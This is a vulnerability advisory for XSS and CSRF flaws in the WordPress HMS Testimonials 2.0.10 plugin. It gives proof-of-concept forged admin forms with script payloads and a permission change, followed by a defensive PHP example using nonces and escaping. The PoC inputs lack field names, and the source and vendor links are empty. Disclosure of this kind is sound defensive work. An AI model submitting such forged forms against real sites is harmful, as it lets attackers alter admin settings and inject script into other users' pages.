WordPress HMS Testimonials 2.0.10 XSS / CSRF Vulnerabilities

Published: 2013-08-09
Updated: 2013-08-10

Affected systems:
WordPress HMS Testimonials 2.0.10
Description:
--------------------------------------------------------------------------------
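The WordPress HMS Testimonials plugin displays customer testimonials on pages or posts.

All forms in WordPress HMS Testimonials are affected by CSRF vulnerabilities, which can allow a remote attacker to perform unauthorized database operations.

<*Source: Jeff Kreitner
 
  Link:
*>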

Test method:
--------------------------------------------------------------------------------

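Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!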

Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="08/08/2013">
    <input type="hidden" value="<script>alert(String.fromCharCode(88,83,83))</script>">
    <input type="hidden" value="<script>alert('xss')</script>">
    <input type="hidden" value="1">
    <input type="submit" value="Save Testimonial">
</form>

2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
    <input type="hidden" value="New group">
    <input type="submit" value="Save Group">
</form>

3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
    <input type="hidden" value="1">
    <input type="hidden" value='100'>
    <input type="hidden" value='100'>
    <input type="hidden" value='m/d/Y"><script>alert(3)</script>'>
    <input type="hidden" value='div'>
    <input type="hidden" value="">
    <input type="hidden" value="">
    <input type="submit" value="Save Settings (Default)">
</form>

3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="9999">
    <input type="hidden" value="subscriber">
    <input type="hidden" value="1">
    <input type="hidden" value="1">
    <input type="hidden" value="editor">
    <input type="hidden" value="author">
    <input type="hidden" value="contributor">
    <input type="hidden" value="subscriber">
    <input type="submit" value="Save Settings (Advanced)">
</form>

3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
    <input type="hidden" value="xss">
    <input type="hidden" value="textarea">
    <input type="hidden" value="1">
    <input type="submit" value="Save Settings (Custom Fields)">
</form>

3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
    <input type="hidden" value="New template<script>alert('xss')</script>">
    <input type="hidden" value="system_id">
    <input type="submit" value="Settings Templates (Save)">
</form>
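
How a WordPress admin handler can refuse cross-site posts like the forms above and neutralize script in stored values, shown as an added example that is not the plugin's or the vendor's code. The hmsx_* functions, the hmsx_save_testimonial action, the option name and the field names are hypothetical; the WordPress calls used (wp_nonce_field, check_admin_referer, current_user_can, sanitize_text_field, esc_html and the others) are core APIs.

```php
<?php
// Added example, not the HMS Testimonials source. All hmsx_* names, the
// 'hmsx_save_testimonial' action and the field names are hypothetical.

// Render the admin form (called from the plugin's admin page callback)
// with a nonce bound to the current user and to this one action.
function hmsx_render_form() {
    $saved = get_option( 'hmsx_testimonial', array( 'name' => '', 'text' => '' ) );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="hmsx_save_testimonial">
        <?php wp_nonce_field( 'hmsx_save_testimonial', 'hmsx_nonce' ); ?>
        <input type="text" name="hmsx_name" value="<?php echo esc_attr( $saved['name'] ); ?>">
        <textarea name="hmsx_text"><?php echo esc_textarea( $saved['text'] ); ?></textarea>
        <?php submit_button( 'Save Testimonial' ); ?>
    </form>
    <?php
}

// Handle the POST: capability check, nonce check, then sanitize before storing.
function hmsx_handle_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request when the nonce is absent or invalid, which is the
    // case for a form submitted from another site on the admin's behalf.
    check_admin_referer( 'hmsx_save_testimonial', 'hmsx_nonce' );

    $name = isset( $_POST['hmsx_name'] ) ? sanitize_text_field( wp_unslash( $_POST['hmsx_name'] ) ) : '';
    $text = isset( $_POST['hmsx_text'] ) ? wp_kses_post( wp_unslash( $_POST['hmsx_text'] ) ) : '';

    update_option( 'hmsx_testimonial', array( 'name' => $name, 'text' => $text ) );
    wp_safe_redirect( admin_url( 'admin.php?page=hmsx-testimonials&updated=1' ) );
    exit;
}
add_action( 'admin_post_hmsx_save_testimonial', 'hmsx_handle_save' );

// Front-end output: escape again at the point of display, so a value that
// reached the database by another route still cannot run as script.
function hmsx_shortcode() {
    $saved = get_option( 'hmsx_testimonial', array( 'name' => '', 'text' => '' ) );
    return '<blockquote>' . wp_kses_post( $saved['text'] )
        . '<cite>' . esc_html( $saved['name'] ) . '</cite></blockquote>';
}
add_shortcode( 'hmsx_testimonial', 'hmsx_shortcode' );
```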

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

WordPress
---------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:
